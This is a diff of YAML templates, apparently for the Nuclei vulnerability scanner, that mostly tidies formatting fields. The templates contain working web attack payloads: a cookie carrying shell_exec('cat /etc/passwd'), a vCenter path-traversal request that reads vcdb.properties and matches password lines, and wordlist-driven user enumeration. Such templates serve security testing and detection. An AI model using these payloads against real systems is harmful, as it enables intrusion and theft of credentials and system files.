- type: word - type: word
part: body part: body
words: words:
- 'quotaExceeded' - 'quotaExceeded'
- type: status - type: status
status: status:
- 200 - 200

View File

@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
Referer: {{BaseURL}} Referer: {{BaseURL}}
threads: 50
payloads: payloads:
user: helpers/wordlists/user-list.txt user: helpers/wordlists/user-list.txt
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
Referer: {{BaseURL}} Referer: {{BaseURL}}
threads: 50
payloads: payloads:
uid: helpers/wordlists/numbers.txt uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}" - "{{BaseURL}}"
headers: headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb --01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email" Content-Disposition: form-data; name="email"
test@{{randstr.tld}} test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb --01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid" Content-Disposition: form-data; name="editid"

View File

@ -12,7 +12,7 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
payloads: payloads:
@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status - type: status
status: status:
- 200 - 200